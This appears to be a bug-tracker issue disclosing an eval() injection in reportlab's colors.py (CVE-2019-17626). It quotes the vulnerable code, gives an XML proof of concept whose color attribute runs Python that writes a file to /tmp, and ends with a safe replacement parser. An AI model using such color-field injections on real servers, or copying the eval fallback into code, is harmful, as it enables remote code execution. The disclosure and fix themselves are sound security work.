eval in colors.py leads to remote code execution

Issue #199 new
ravi prakash giri created an issue

Hi there,

I was looking at the source code of colors.py and found one instance where the __call__ of the toColor class evaluates the HTML color code without any validation. There is a CVE assigned for this issue as well: CVE-2019-17626.

```python
elif isStr(arg):
    arg = asNative(arg)
    C = cssParse(arg)
    if C: return C
    if arg in self.extraColorsNS: return self.extraColorsNS[arg]
    C = getAllNamedColors()
    s = arg.lower()
    if s in C: return C[s]
    try:
        return toColor(eval(arg))     # <--- Here
    except:  # remainder of the snippet omitted in the report
```

I wrote a PoC and verified the same with the following XML:

```xml
<myroot>
    <label>hello-world</label>
    <row1>
        <html>
            <span color="open('/tmp/colors_poc.txt','wb').write('hello world!')">abcdef</span>
        </html>
    </row1>
</myroot>
```

Suppose a web server is using reportlab to allow users to generate PDFs from XML documents (code similar to the above). When an input like the above is used, the function in colors.py will be called, which will trigger the eval sink and hence will create a colors_poc.txt file under the /tmp directory of the server.
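A defensive alternative to the eval() fallback shown above, added here as an illustrative example and not reportlab's own patch: a colour parser that accepts only hex, rgb() and a named-colour table and raises on anything else, so an unrecognised string is never evaluated. NAMED_COLORS is a constructed three-entry stub standing in for reportlab's full table.

```python
import re

# Constructed stub of a named-colour table (reportlab's real table is far larger).
NAMED_COLORS = {
    "red": (1.0, 0.0, 0.0),
    "black": (0.0, 0.0, 0.0),
    "white": (1.0, 1.0, 1.0),
}

# The only three grammars accepted: #rrggbb, #rgb and rgb(r, g, b).
_HEX6 = re.compile(r"^#([0-9a-f]{6})$")
_HEX3 = re.compile(r"^#([0-9a-f]{3})$")
_RGB = re.compile(r"^rgb\(\s*(\d{1,3})\s*,\s*(\d{1,3})\s*,\s*(\d{1,3})\s*\)$")


def parse_color(text):
    """Return an (r, g, b) tuple of floats in [0, 1] for a CSS-style colour
    string, or raise ValueError. Unlike the eval() fallback in the report,
    input that matches none of the known forms is rejected, not evaluated."""
    if not isinstance(text, str):
        raise TypeError("colour must be a string")
    s = text.strip().lower()
    m = _HEX6.match(s)
    if m:
        h = m.group(1)
        return tuple(int(h[i:i + 2], 16) / 255.0 for i in (0, 2, 4))
    m = _HEX3.match(s)
    if m:
        # #abc expands to #aabbcc
        return tuple(int(c * 2, 16) / 255.0 for c in m.group(1))
    m = _RGB.match(s)
    if m:
        parts = tuple(int(v) for v in m.groups())
        if any(v > 255 for v in parts):
            raise ValueError("rgb() component out of range: %r" % text)
        return tuple(v / 255.0 for v in parts)
    if s in NAMED_COLORS:
        return NAMED_COLORS[s]
    # Anything else, including Python expressions, is an error.
    raise ValueError("unrecognised colour: %r" % text)


def is_valid_color(text):
    """True if parse_color() accepts the string, False otherwise."""
    try:
        parse_color(text)
        return True
    except (ValueError, TypeError):
        return False
```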
